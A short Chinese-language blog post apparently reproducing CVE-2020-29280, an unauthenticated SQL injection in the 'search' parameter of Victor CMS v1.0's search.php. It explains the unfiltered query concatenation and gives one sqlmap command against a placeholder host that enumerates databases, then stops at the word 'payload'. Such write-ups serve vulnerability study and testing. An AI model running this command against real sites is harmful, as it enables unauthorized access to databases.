1. 程式人生 > 資料庫 >Victor CMS 未授權sql注入(CVE-2020-29280)漏洞復現

Victor CMS 未授權sql注入(CVE-2020-29280)漏洞復現

0X00簡介

The Victor CMS v1.0版本存在安全漏洞,該漏洞源於通過search.php頁面上的“search”引數造成的。

0X01影響範圍

The Victor CMS v1.0

0X02漏洞復現

在search.php中search引數未經過濾就直接和sql語句拼接導致sql注入漏洞

1.訪問首頁點選搜尋框,測試

直接上sqlmap,

python.exe .\sqlmap.py -u "http://mode.com/search.php" --data="search=1337*&submit=" --dbs --random-agent -v 3

payload